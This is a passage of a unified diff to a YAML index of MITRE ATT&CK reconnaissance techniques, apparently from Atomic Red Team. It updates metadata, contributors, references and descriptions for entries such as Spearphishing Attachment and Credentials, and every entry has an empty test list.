+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -55431,7 +56118,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -55449,47 +56136,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -55498,19 +56148,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -55533,7 +56219,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -55549,8 +56235,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -55576,7 +56260,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -55592,8 +56276,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -55621,7 +56303,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -55637,12 +56319,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -55651,16 +56331,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -55673,8 +56353,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -55685,52 +56365,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+      created: '2020-10-02T17:01:42.558Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1597
+        external_id: T1597
+      - source_name: ZDNET Selling Data
+        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+          73 million user records on the dark web. Retrieved October 20, 2020.
+        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1592.003:
     technique:
@@ -55752,7 +56430,7 @@ reconnaissance:
         url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
         description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
           source code and proprietary data dumped online. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:22:46.759Z'
       name: Firmware
       description: |-
         Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -55768,8 +56446,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.002:
     technique:
@@ -55795,7 +56471,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:33:19.596Z'
       name: Software
       description: |-
         Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -55813,8 +56489,6 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.001:
     technique:
@@ -55836,7 +56510,7 @@ reconnaissance:
         url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:52:40.958Z'
       name: Social Media
       description: |-
         Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -55852,12 +56526,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.001:
     technique:
-      modified: '2023-04-14T23:29:10.396Z'
+      modified: '2024-10-10T13:45:01.069Z'
       name: Credentials
       description: "Adversaries may gather credentials that can be used during targeting.
         Account credentials gathered by adversaries may be those directly associated
@@ -55867,17 +56539,20 @@ reconnaissance:
         elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
         Adversaries may also compromise sites then add malicious content designed
         to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
-        Credential information may also be exposed to adversaries via leaks to online
-        or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
-        breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
-        Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
-        GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
-        may also purchase credentials from dark web or other black-markets. Finally,
-        where multi-factor authentication (MFA) based on out-of-band communications
-        is in use, adversaries may compromise a service provider to gain access to
-        MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
-        this information may reveal opportunities for other forms of reconnaissance
-        (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+        (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+        Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+        GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+        based on out-of-band communications is in use, adversaries may compromise
+        a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+        Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+        adversaries via leaks to online or other accessible data sets (ex: [Search
+        Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+        repositories, etc.). Adversaries may purchase credentials from dark web markets,
+        such as Russian Market and 2easy, or through access to Telegram channels that
+        distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+        2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+        Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+        for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
         or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
         establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
         and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
@@ -55889,6 +56564,7 @@ reconnaissance:
       - Vinayak Wadhwa, Lucideus
       - Lee Christensen, SpecterOps
       - Toby Kohlenberg
+      - Massimo Giaimo, Würth Group Cyber Defence Center
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -55899,7 +56575,7 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       type: attack-pattern
       id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
       created: '2020-10-02T14:55:43.815Z'
@@ -55909,6 +56585,10 @@ reconnaissance:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1589/001
         external_id: T1589.001
+      - source_name: Bleeping Computer 2easy 2021
+        description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+          web marketplace for stolen data. Retrieved October 7, 2024.
+        url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
       - source_name: ATT ScanBox
         description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
           Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -55921,6 +56601,10 @@ reconnaissance:
         description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
           19, 2020.
         url: https://github.com/dxa4481/truffleHog
+      - source_name: Bleeping Computer Stealer Logs 2023
+        description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+          Stealer Logs in Context. Retrieved October 10, 2024.'
+        url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
       - source_name: Register Uber
         description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
           into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -55943,6 +56627,10 @@ reconnaissance:
           Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
           October 19, 2020.
         url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+      - source_name: SecureWorks Infostealers 2023
+        description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+          The Growing Threat from Infostealers. Retrieved October 10, 2024.
+        url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
       - source_name: Register Deloitte
         description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
           Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -55950,9 +56638,8 @@ reconnaissance:
         url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.003:
     technique:
@@ -56011,7 +56698,7 @@ reconnaissance:
         adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
         to access valuable information that can be exfiltrated or used to escalate
         privileges and move laterally. "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-15T19:10:23.838Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Wordlist Scanning
       x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56031,7 +56718,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1591.004:
     technique:
@@ -56053,7 +56739,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:39:08.904Z'
       name: Identify Roles
       description: |-
         Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56069,12 +56755,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598:
     technique:
-      modified: '2023-09-08T20:28:49.600Z'
+      modified: '2024-05-31T04:18:44.570Z'
       name: Phishing for Information
       description: "Adversaries may send phishing messages to elicit sensitive information
         that can be used during targeting. Phishing for information is an attempt
@@ -56143,7 +56827,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Avertium callback phishing
         description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
           PHISHING. Retrieved February 2, 2023.
@@ -56191,31 +56875,12 @@ reconnaissance:
         url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.001:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
-      type: attack-pattern
-      created: '2020-10-02T16:54:23.193Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1595.001
-        url: https://attack.mitre.org/techniques/T1595/001
-      - source_name: Botnet Scan
-        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
-        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
-          a Botnet. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:46:55.039Z'
       name: Scanning IP Blocks
       description: |-
         Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
@@ -56224,19 +56889,41 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Diego Sappa, Securonix
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
 
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+      created: '2020-10-02T16:54:23.193Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1595/001
+        external_id: T1595.001
+      - source_name: Botnet Scan
+        description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+          a Botnet. Retrieved October 20, 2020.
+        url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1590.001:
     technique:
@@ -56294,7 +56981,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596.005:
     technique:
@@ -56315,7 +57001,7 @@ reconnaissance:
       - source_name: Shodan
         url: https://shodan.io
         description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:49:49.260Z'
       name: Scan Databases
       description: |-
         Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
@@ -56331,8 +57017,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.001:
     technique:
@@ -56358,7 +57042,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.025Z'
       name: Determine Physical Locations
       description: |-
